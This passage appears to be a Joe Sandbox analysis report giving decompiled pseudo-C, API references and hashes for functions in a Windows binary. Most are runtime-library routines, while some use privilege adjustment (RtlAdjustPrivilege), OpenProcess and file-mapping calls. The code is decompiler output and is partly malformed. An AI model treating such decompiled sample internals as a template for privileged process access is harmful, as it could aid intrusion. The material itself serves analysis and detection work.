				asm("movsd xmm0, [0xbb42]");
				asm("movups [0xd58b], xmm1");
				_t125 =  <  ? _t129 : 0xcef306b0;
				r9d = 8;
				asm("movsd [0xd582], xmm0");
				_v144 =  <  ? _t129 : 0xcef306b0;
				_v152 = 0xcef306a8;
				if (E00007FF77FF7CEF23DA8(_t129, 0xcef30688, 0xcef2f040, _t156, 0xcef30688, 0xcef2f0d0, _t168, _t169) == 0) goto 0xcef23578;
				_t127 =  *0xcef30920; // 0x7ff7cef2c018
				_t61 =  *((intOrPtr*)(_t127 + 0x10))();
				_a8 = _t61;
				if (_t61 >= 0) goto 0xcef235eb;
				_t157 =  *0xcef30688; // 0x0
				_t116 = _t157;
				if (_t116 == 0) goto 0xcef235d8;
				if (_t116 == 0) goto 0xcef235c2;
				if (_t116 == 0) goto 0xcef23599;
				if (_t116 == 0) goto 0xcef235c2;
				if ( *_t157 - 0xffffffffffffffff != 3) goto 0xcef235cc;
				goto 0xcef235c2;
				_t128 =  *((intOrPtr*)(_t157 + 8));
				if (_t128 == 0) goto 0xcef235cc;
				_t161 =  *_t128;
				if ( *((intOrPtr*)(_t161 + 8)) == 0) goto 0xcef235b4;
				UnmapViewOfFile(??);
				if ( *_t161 == _t129) goto 0xcef235c2;
				CloseHandle(??);
				LocalFree(??);
				LocalFree(??);
				 *0xcef30688 = _t128; // executed
				FindCloseChangeNotification(??); // executed
				return _a8;
			}

0x7ff7cef2326c
0x7ff7cef2328a
0x7ff7cef23291
0x7ff7cef23295
0x7ff7cef2329d
0x7ff7cef232a0
0x7ff7cef232ac
0x7ff7cef232b3
0x7ff7cef232bd
0x7ff7cef232c4
0x7ff7cef232cb
0x7ff7cef232ce
0x7ff7cef232d4
0x7ff7cef232e0
0x7ff7cef232e3
0x7ff7cef232e7
0x7ff7cef232ed
0x7ff7cef232f7
0x7ff7cef232f9
0x7ff7cef232fe
0x7ff7cef232fe
0x7ff7cef23302
0x7ff7cef2330a
0x7ff7cef2330e
0x7ff7cef2330e
0x7ff7cef23312
0x7ff7cef2331a
0x7ff7cef23320
0x7ff7cef23331
0x7ff7cef23335
0x7ff7cef23339
0x7ff7cef2333f
0x7ff7cef23343
0x7ff7cef23346
0x7ff7cef23355
0x7ff7cef23359
0x7ff7cef23360
0x7ff7cef23370
0x7ff7cef23374
0x7ff7cef23389
0x7ff7cef2338e
0x7ff7cef23397
0x7ff7cef2339d
0x7ff7cef233a6
0x7ff7cef233b2
0x7ff7cef233bc
0x7ff7cef233d9
0x7ff7cef233df
0x7ff7cef233ea
0x7ff7cef233f8
0x7ff7cef23400
0x7ff7cef23402
0x7ff7cef23405
0x7ff7cef2340c
0x7ff7cef23415
0x7ff7cef2341b
0x7ff7cef2341f
0x7ff7cef23429
0x7ff7cef2342f
0x7ff7cef23438
0x7ff7cef23442
0x7ff7cef23446
0x7ff7cef23448
0x7ff7cef2345b
0x7ff7cef23461
0x7ff7cef23463
0x7ff7cef23469
0x7ff7cef2346f
0x7ff7cef23476
0x7ff7cef2347c
0x7ff7cef23482
0x7ff7cef2348c
0x7ff7cef2349e
0x7ff7cef234a7
0x7ff7cef234a9
0x7ff7cef234b2
0x7ff7cef234b4
0x7ff7cef234c5
0x7ff7cef234cb
0x7ff7cef234d2
0x7ff7cef234d8
0x7ff7cef234de
0x7ff7cef234e4
0x7ff7cef234f5
0x7ff7cef234fc
0x7ff7cef2350f
0x7ff7cef23516
0x7ff7cef2351e
0x7ff7cef23525
0x7ff7cef23530
0x7ff7cef23536
0x7ff7cef2353e
0x7ff7cef2354d
0x7ff7cef23559
0x7ff7cef2355b
0x7ff7cef2356c
0x7ff7cef23571
0x7ff7cef23576
0x7ff7cef23578
0x7ff7cef2357f
0x7ff7cef23582
0x7ff7cef23588
0x7ff7cef2358c
0x7ff7cef23590
0x7ff7cef23595
0x7ff7cef23597
0x7ff7cef23599
0x7ff7cef235a0
0x7ff7cef235a2
0x7ff7cef235ac
0x7ff7cef235ae
0x7ff7cef235b7
0x7ff7cef235bc
0x7ff7cef235c6
0x7ff7cef235cf
0x7ff7cef235db
0x7ff7cef235e2
0x7ff7cef235fe

APIs

CreateFileW.KERNEL32 ref: 00007FF7CEF2331A
RtlInitUnicodeString.NTDLL ref: 00007FF7CEF23346
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00007FF7CEF2338E
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00007FF7CEF233A6
UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00007FF7CEF235AE
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00007FF7CEF235BC
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00007FF7CEF235C6
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00007FF7CEF235CF
FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00007FF7CEF235E2

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseFile$ChangeCreateFindHandleInitNotificationOpenProcessStringUnicodeUnmapView
String ID:
API String ID: 34978191-0
Opcode ID: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
Instruction ID: ca74c4832288f881fe86a5a6d222fc335c7cd8e3a6660a637c4d511eedfe12d5
Opcode Fuzzy Hash: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
Instruction Fuzzy Hash: A7A14072E0AA438AFB94EF21E841678B7A1BF847A4F944136C90D67B94DF7CE445C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF266BC Relevance: 10.7, APIs: 7, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00007FF77FF7CEF266BC(intOrPtr __rax, long long __rbx, void* __rdx, long long __rdi) {
				signed char _t83;
				signed int _t84;
				intOrPtr _t90;
				intOrPtr _t93;
				void* _t95;
				intOrPtr _t99;
				intOrPtr _t101;
				signed int _t104;
				intOrPtr _t106;
				intOrPtr _t138;
				intOrPtr _t140;
				void* _t142;
				long long _t147;
				struct _STARTUPINFOW* _t149;
				intOrPtr _t163;
				void* _t164;
				void* _t166;
				intOrPtr _t171;
				void* _t173;
				long long _t174;
				long long* _t177;
				void* _t180;
				void* _t181;
				void* _t184;
				intOrPtr* _t186;
				void* _t189;
				signed char* _t190;
				struct _STARTUPINFOW* _t193;

				_t162 = __rdx;
				_t148 = __rbx;
				_t138 = __rax;
				 *((long long*)(_t180 + 8)) = __rbx;
				 *((long long*)(_t180 + 0x10)) = _t174;
				 *((long long*)(_t180 + 0x18)) = __rdi;
				_t181 = _t180 - 0x90;
				GetStartupInfoW(_t193);
				_t5 = _t162 - 0x38; // 0x20
				_t106 = _t5;
				E00007FF77FF7CEF27520(__rbx, _t181 + 0x20, __rdx, __rdi, _t173, _t174, _t189, _t184);
				r14d = 0;
				_t163 = _t138;
				if (_t138 != 0) goto 0xcef26705;
				goto 0xcef26970;
				 *0xcef306e0 = _t138;
				 *0xcef306c8 = _t106;
				if (_t163 - _t138 + 0xb00 >= 0) goto 0xcef26764;
				_t164 = _t163 + 9;
				 *(_t164 - 9) =  *(_t164 - 9) | 0xffffffff;
				 *((short*)(_t164 - 1)) = 0xa00;
				 *(_t164 + 3) = r14d;
				 *((short*)(_t164 + 0x2f)) = 0xa00;
				 *((char*)(_t164 + 0x31)) = 0xa;
				 *(_t164 + 0x47) = r14d;
				 *((intOrPtr*)(_t164 + 0x43)) = r14b;
				_t140 =  *0xcef306e0; // 0x2150b10
				_t14 = _t164 + 0x58 - 9; // -106
				if (_t14 - _t140 + 0xb00 < 0) goto 0xcef26723;
				_t93 =  *0xcef306c8; // 0x20
				if ( *((intOrPtr*)(_t181 + 0x62)) == r14w) goto 0xcef268a4;
				_t142 =  *((intOrPtr*)(_t181 + 0x68));
				if (_t142 == 0) goto 0xcef268a4;
				_t190 = _t142 + 4;
				_t186 =  *_t142 + _t190;
				_t89 =  <  ?  *_t142 : 0x800;
				if (_t93 - 0x800 >= 0) goto 0xcef26821;
				E00007FF77FF7CEF27520(_t148, _t174, _t164 + 0x58, 0xcef306e8, _t173, _t174);
				if (_t142 == 0) goto 0xcef2681b;
				_t99 =  *0xcef306c8; // 0x20
				_t18 = _t142 + 0xb00; // 0xb00
				 *0xcef306e8 = _t142;
				 *0xcef306c8 = _t99 + _t106;
				if (_t142 - _t18 >= 0) goto 0xcef26811;
				_t19 = _t142 + 9; // 0x9
				_t166 = _t19;
				 *(_t166 - 9) =  *(_t166 - 9) | 0xffffffff;
				 *(_t166 + 0x2f) =  *(_t166 + 0x2f) & 0x00000080;
				 *((short*)(_t166 - 1)) = 0xa00;
				 *(_t166 + 3) = r14d;
				 *((short*)(_t166 + 0x30)) = 0xa0a;
				 *(_t166 + 0x47) = r14d;
				 *((intOrPtr*)(_t166 + 0x43)) = r14b;
				_t29 = _t166 + 0x58 - 9; // -88
				if (_t29 -  *0xcef306e8 + 0xb00 < 0) goto 0xcef267d4;
				_t101 =  *0xcef306c8; // 0x20
				_t118 = _t101 - ( <  ?  *_t142 : 0x800);
				if (_t101 - ( <  ?  *_t142 : 0x800) < 0) goto 0xcef267a1;
				goto 0xcef26821;
				_t90 =  *0xcef306c8; // 0x20
				_t104 = r14d;
				if (_t90 <= 0) goto 0xcef268a4;
				if ( *_t186 == 0xffffffff) goto 0xcef26897;
				if ( *_t186 == 0xfffffffe) goto 0xcef26897;
				if (( *_t190 & 0x00000001) == 0) goto 0xcef26897;
				if (( *_t190 & 0x00000008) != 0) goto 0xcef26852;
				if (GetFileType(??) == 0) goto 0xcef26897;
				_t177 = _t104 * 0x58 +  *((intOrPtr*)(0xcef306e0 + (_t104 >> 5) * 8));
				_t147 =  *_t186;
				 *_t177 = _t147;
				 *((char*)(_t177 + 8)) =  *_t190;
				if (InitializeCriticalSectionAndSpinCount(??, ??) == 0) goto 0xcef266fd;
				 *((intOrPtr*)(_t177 + 0xc)) =  *((intOrPtr*)(_t177 + 0xc)) + 1;
				if (_t104 + 1 - _t90 < 0) goto 0xcef26828;
				r12d = r14d;
				_t149 = _t193;
				_t171 =  *0xcef306e0; // 0x2150b10
				if ( *((long long*)(_t149 + _t171)) == 0xffffffff) goto 0xcef268c9;
				if ( *((long long*)(_t149 + _t171)) == 0xfffffffe) goto 0xcef268c9;
				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000080;
				goto 0xcef2694e;
				 *(_t149 + _t171 + 8) = 0x81;
				asm("sbb ecx, ecx");
				_t95 =  ==  ? 0xfffffff6 : _t93 + 0xfffffff5;
				GetStdHandle(??);
				if (_t147 == 0xffffffff) goto 0xcef26941;
				if (_t147 == 0) goto 0xcef26941;
				_t83 = GetFileType(??); // executed
				if (_t83 == 0) goto 0xcef26941;
				_t84 = _t83 & 0x000000ff;
				 *((long long*)(_t149 + _t171)) = _t147;
				if (_t84 != 2) goto 0xcef26919;
				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000040;
				goto 0xcef26923;
				if (_t84 != 3) goto 0xcef26923;
				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000008;
				if (InitializeCriticalSectionAndSpinCount(??, ??) == 0) goto 0xcef266fd;
				 *((intOrPtr*)(_t149 + _t171 + 0xc)) =  *((intOrPtr*)(_t149 + _t171 + 0xc)) + 1;
				goto 0xcef2694e;
				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000040;
				 *((long long*)(_t149 + _t171)) = 0xfffffffe;
				r12d = r12d + 1;
				if (_t149 + 0x58 - 0x108 < 0) goto 0xcef268aa;
				SetHandleCount(??);
				return 0;
			}

0x7ff7cef266bc
0x7ff7cef266bc
0x7ff7cef266bc
0x7ff7cef266bc
0x7ff7cef266c1
0x7ff7cef266c6
0x7ff7cef266d1
0x7ff7cef266dd
0x7ff7cef266e8
0x7ff7cef266e8
0x7ff7cef266ed
0x7ff7cef266f2
0x7ff7cef266f5
0x7ff7cef266fb
0x7ff7cef26700
0x7ff7cef26705
0x7ff7cef26714
0x7ff7cef2671d
0x7ff7cef2671f
0x7ff7cef26723
0x7ff7cef26728
0x7ff7cef2672e
0x7ff7cef26732
0x7ff7cef26738
0x7ff7cef2673c
0x7ff7cef26740
0x7ff7cef26744
0x7ff7cef2674f
0x7ff7cef2675c
0x7ff7cef2675e
0x7ff7cef2676a
0x7ff7cef26770
0x7ff7cef26778
0x7ff7cef26786
0x7ff7cef2678a
0x7ff7cef2678f
0x7ff7cef26794
0x7ff7cef267a9
0x7ff7cef267b1
0x7ff7cef267b3
0x7ff7cef267b9
0x7ff7cef267c0
0x7ff7cef267c5
0x7ff7cef267ce
0x7ff7cef267d0
0x7ff7cef267d0
0x7ff7cef267d4
0x7ff7cef267d9
0x7ff7cef267dd
0x7ff7cef267e3
0x7ff7cef267e7
0x7ff7cef267ed
0x7ff7cef267f1
0x7ff7cef267fc
0x7ff7cef26809
0x7ff7cef2680b
0x7ff7cef26815
0x7ff7cef26817
0x7ff7cef26819
0x7ff7cef2681b
0x7ff7cef26821
0x7ff7cef26826
0x7ff7cef2682d
0x7ff7cef26834
0x7ff7cef2683b
0x7ff7cef26842
0x7ff7cef26850
0x7ff7cef2686f
0x7ff7cef26873
0x7ff7cef26877
0x7ff7cef26883
0x7ff7cef2688e
0x7ff7cef26894
0x7ff7cef268a2
0x7ff7cef268a4
0x7ff7cef268a7
0x7ff7cef268aa
0x7ff7cef268b6
0x7ff7cef268bd
0x7ff7cef268bf
0x7ff7cef268c4
0x7ff7cef268ce
0x7ff7cef268da
0x7ff7cef268e2
0x7ff7cef268e5
0x7ff7cef268f2
0x7ff7cef268f7
0x7ff7cef268fc
0x7ff7cef26904
0x7ff7cef26906
0x7ff7cef26909
0x7ff7cef26910
0x7ff7cef26912
0x7ff7cef26917
0x7ff7cef2691c
0x7ff7cef2691e
0x7ff7cef26935
0x7ff7cef2693b
0x7ff7cef2693f
0x7ff7cef26941
0x7ff7cef26946
0x7ff7cef26952
0x7ff7cef2695c
0x7ff7cef26968
0x7ff7cef2698d

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF7CEF266DD

Part of subcall function 00007FF7CEF27520: Sleep.KERNEL32(?,?,?,00007FF7CEF25233,?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5), ref: 00007FF7CEF27565

GetFileType.KERNEL32 ref: 00007FF7CEF26848
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF7CEF26886

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
String ID:
API String ID: 3473179607-0
Opcode ID: 2b97fe4d96a52dfacd4053596027578da95e05ddabbf4bf779a920701995bae6
Instruction ID: 65d27ed1703dd0b998a08948a98c6b0c356b31c75f0e2d98e2a9a7b476a901f4
Opcode Fuzzy Hash: 2b97fe4d96a52dfacd4053596027578da95e05ddabbf4bf779a920701995bae6
Instruction Fuzzy Hash: DC819C61A09B8286EB94AF24944436CB7A0FF44B74F958335CA7E222D6EF3CE555D320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF259E4 Relevance: 10.6, APIs: 7, Instructions: 98
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_lock.LIBCMT ref: 00007FF7CEF25A0D

Part of subcall function 00007FF7CEF2741C: _amsg_exit.LIBCMT ref: 00007FF7CEF27446

RtlDecodePointer.NTDLL(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25A40
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25A5E
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25A9E
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25AB8
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25AC8
ExitProcess.KERNEL32 ref: 00007FF7CEF25B54

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: DecodePointer$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3411037476-0
Opcode ID: e33f3bb100115732c2f51f8b4028eacb237136a35dc5d5b4a08dbeaa5a4c465a
Instruction ID: c615545098d6516fa9f830edb3da67d83312a76b5b92c3da639d21b0285c1a85
Opcode Fuzzy Hash: e33f3bb100115732c2f51f8b4028eacb237136a35dc5d5b4a08dbeaa5a4c465a
Instruction Fuzzy Hash: 60417C31A1AA4285FAC1BF11F881128E2A4FF88BB4F844435D94E677A5EF7DE4918721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF28F3C Relevance: 4.5, APIs: 3, Instructions: 46
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00007FF77FF7CEF28F3C(void* __eax, long long __rbx, signed int __rcx, signed int __rdx, intOrPtr* __r8, long long _a8) {
				void* _t16;
				intOrPtr* _t29;
				signed int _t36;

				_t36 = __rdx;
				_a8 = __rbx;
				if (__rcx == 0) goto 0xcef28f6e;
				_t2 = _t36 - 0x20; // -32
				_t29 = _t2;
				if (_t29 - __rdx >= 0) goto 0xcef28f6e;
				E00007FF77FF7CEF25798(_t29 - __rdx, _t29);
				 *_t29 = 0xc;
				goto 0xcef28fcb;
				_t39 =  ==  ? _t29 : __rdx * __rcx;
				if (( ==  ? _t29 : __rdx * __rcx) - 0xffffffe0 > 0) goto 0xcef28f9e;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t29 != 0) goto 0xcef28fcb;
				if ( *0xcef30610 == 0) goto 0xcef28fc0;
				_t16 = E00007FF77FF7CEF28598(_t29,  ==  ? _t29 : __rdx * __rcx);
				if (_t16 != 0) goto 0xcef28f7e;
				if (__r8 == 0) goto 0xcef28f6a;
				 *__r8 = 0xc;
				goto 0xcef28f6a;
				if (__r8 == 0) goto 0xcef28fcb;
				 *__r8 = 0xc;
				return _t16;
			}

0x7ff7cef28f3c
0x7ff7cef28f3c
0x7ff7cef28f4f
0x7ff7cef28f53
0x7ff7cef28f53
0x7ff7cef28f5d
0x7ff7cef28f5f
0x7ff7cef28f64
0x7ff7cef28f6c
0x7ff7cef28f7a
0x7ff7cef28f84
0x7ff7cef28f93
0x7ff7cef28f9c
0x7ff7cef28fa5
0x7ff7cef28faa
0x7ff7cef28fb1
0x7ff7cef28fb6
0x7ff7cef28fb8
0x7ff7cef28fbe
0x7ff7cef28fc3
0x7ff7cef28fc5
0x7ff7cef28fd5

APIs

_errno.LIBCMT ref: 00007FF7CEF28F5F
RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7CEF27553,?,?,?,00007FF7CEF25233,?,?,?,00007FF7CEF257A1), ref: 00007FF7CEF28F93
_callnewh.LIBCMT ref: 00007FF7CEF28FAA

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AllocateHeap_callnewh_errno
String ID:
API String ID: 638267422-0
Opcode ID: db9fc2e1e326bc5d9b4b370cbfe639d286153ed901eab296ebd547fe9e2fc535
Instruction ID: a4c57febb9aac7f533963ba8a7d1c770db0483f08af04836d059d1500f8d47c8
Opcode Fuzzy Hash: db9fc2e1e326bc5d9b4b370cbfe639d286153ed901eab296ebd547fe9e2fc535
Instruction Fuzzy Hash: 1911C825B0968A85FFD5AF11D644378E392AF84BF0F884630D92D276C4EF7CA5408224

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF2245C Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E00007FF77FF7CEF2245C(void* __ecx, void* __edx, long long __rax, void* __rdx, void* __r9, char _a8) {
				intOrPtr _v16;
				char _v24;
				long _t10;
				long long _t24;
				signed int _t28;
				intOrPtr _t33;
				void* _t36;
				intOrPtr _t40;

				_t24 = __rax;
				if (__ecx - 1 <= 0) goto 0xcef22475;
				E00007FF77FF7CEF22348(__rax, _t28,  *((intOrPtr*)(__rdx + 8)), _t36); // executed
				 *0xcef2f4e0 = _t24;
				__imp__RtlGetNtVersionNumbers();
				 *0xcef30ad0 =  *0xcef30ad0 & 0x00003fff;
				r8d = 0;
				_t10 = RtlAdjustPrivilege(??, ??, ??, ??); // executed
				if (_t10 < 0) goto 0xcef224fc;
				_t26 =  <  ? 0xcef2bff0 : 0xcef2c018;
				_v16 = 2;
				 *0xcef30920 =  <  ? 0xcef2bff0 : 0xcef2c018;
				_v24 = 0xcef2be90;
				E00007FF77FF7CEF236D8(0x7ff7cef30ad1, _t28,  &_v24, 0xcef30ac8, 0xcef30ad0,  &_a8);
				_t40 =  *0xcef30920; // 0x7ff7cef2c018
				 *((intOrPtr*)(_t40 + 8))();
				_t33 =  *0xcef2f4e0; // 0x13c
				if (_t33 == 0xffffffff) goto 0xcef2250f;
				CloseHandle(??);
				return 0;
			}

0x7ff7cef2245c
0x7ff7cef22463
0x7ff7cef22469
0x7ff7cef2246e
0x7ff7cef2248a
0x7ff7cef22490
0x7ff7cef2249a
0x7ff7cef224a9
0x7ff7cef224b1
0x7ff7cef224c8
0x7ff7cef224d1
0x7ff7cef224d9
0x7ff7cef224e7
0x7ff7cef224ec
0x7ff7cef224f1
0x7ff7cef224f8
0x7ff7cef224fc
0x7ff7cef22507
0x7ff7cef22509
0x7ff7cef22515

APIs

RtlGetNtVersionNumbers.NTDLL ref: 00007FF7CEF2248A
RtlAdjustPrivilege.NTDLL ref: 00007FF7CEF224A9
CloseHandle.KERNEL32 ref: 00007FF7CEF22509

Part of subcall function 00007FF7CEF22348: GetProcessHeap.KERNEL32 ref: 00007FF7CEF2237C
Part of subcall function 00007FF7CEF22348: HeapAlloc.KERNEL32 ref: 00007FF7CEF2238C
Part of subcall function 00007FF7CEF22348: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF7CEF223A6
Part of subcall function 00007FF7CEF22348: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF7CEF223C2
Part of subcall function 00007FF7CEF22348: CreateFileW.KERNELBASE ref: 00007FF7CEF223F1
Part of subcall function 00007FF7CEF22348: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF22407
Part of subcall function 00007FF7CEF22348: GetProcAddress.KERNEL32 ref: 00007FF7CEF22417
Part of subcall function 00007FF7CEF22348: Sleep.KERNEL32 ref: 00007FF7CEF2242B

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: DescriptorHandleHeapSecurity$AddressAdjustAllocCloseCreateDaclFileInitializeModuleNumbersPrivilegeProcProcessSleepVersion
String ID:
API String ID: 366963940-0
Opcode ID: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
Instruction ID: 289b42f6768e40693c35ce0abc1fa8d20c893549fd9226ccf8a85c09f6b7ce6c
Opcode Fuzzy Hash: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
Instruction Fuzzy Hash: B2110432A09A0792EAA0EF10E8550A8B360FF44734FC04232D56DA66E1DF7CE649C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF253DC Relevance: 4.5, APIs: 3, Instructions: 35
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00007FF77FF7CEF253DC(long* __rax) {
				void* __rbx;
				intOrPtr _t5;
				void* _t6;
				long _t8;
				long* _t21;
				void* _t22;
				long* _t23;
				void* _t26;
				void* _t28;
				void* _t29;
				void* _t30;

				_t21 = __rax;
				E00007FF77FF7CEF25880(__rax, _t22, _t26); // executed
				_t5 = E00007FF77FF7CEF27210(_t22, _t28, _t29);
				if (_t5 == 0) goto 0xcef25450;
				__imp__FlsAlloc();
				 *0xcef2e978 = _t5;
				if (_t5 == 0xffffffff) goto 0xcef25450;
				_t6 = E00007FF77FF7CEF27520(_t22, 0x7ff7cef252a8, _t26, _t28, _t29, _t30);
				_t23 = _t21;
				if (_t21 == 0) goto 0xcef25450;
				__imp__FlsSetValue();
				if (_t6 == 0) goto 0xcef25450;
				E00007FF77FF7CEF25148(_t23, _t23, _t21);
				_t8 = GetCurrentThreadId();
				_t23[2] = _t23[2] | 0xffffffff;
				 *_t23 = _t8;
				goto 0xcef25457;
				E00007FF77FF7CEF25120(_t23, _t23, _t21);
				return 0;
			}

0x7ff7cef253dc
0x7ff7cef253e2
0x7ff7cef253e7
0x7ff7cef253ee
0x7ff7cef253f7
0x7ff7cef253fd
0x7ff7cef25406
0x7ff7cef25412
0x7ff7cef25417
0x7ff7cef2541d
0x7ff7cef25428
0x7ff7cef25430
0x7ff7cef25437
0x7ff7cef2543c
0x7ff7cef25442
0x7ff7cef25447
0x7ff7cef2544e
0x7ff7cef25450
0x7ff7cef2545c

APIs

Part of subcall function 00007FF7CEF25880: _initp_misc_winsig.LIBCMT ref: 00007FF7CEF258B1
Part of subcall function 00007FF7CEF25880: EncodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CEF28307

Part of subcall function 00007FF7CEF27210: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF7CEF253EC,?,?,00000000,00007FF7CEF2444C), ref: 00007FF7CEF27255

FlsAlloc.KERNEL32(?,?,00000000,00007FF7CEF2444C), ref: 00007FF7CEF253F7

Part of subcall function 00007FF7CEF27520: Sleep.KERNEL32(?,?,?,00007FF7CEF25233,?,?,?,00007FF7CEF257A1,?,?,?,?,00007FF7CEF242F5), ref: 00007FF7CEF27565

FlsSetValue.KERNEL32(?,?,00000000,00007FF7CEF2444C), ref: 00007FF7CEF25428

Part of subcall function 00007FF7CEF25148: _lock.LIBCMT ref: 00007FF7CEF2519C
Part of subcall function 00007FF7CEF25148: _lock.LIBCMT ref: 00007FF7CEF251BB

GetCurrentThreadId.KERNEL32 ref: 00007FF7CEF2543C

Memory Dump Source

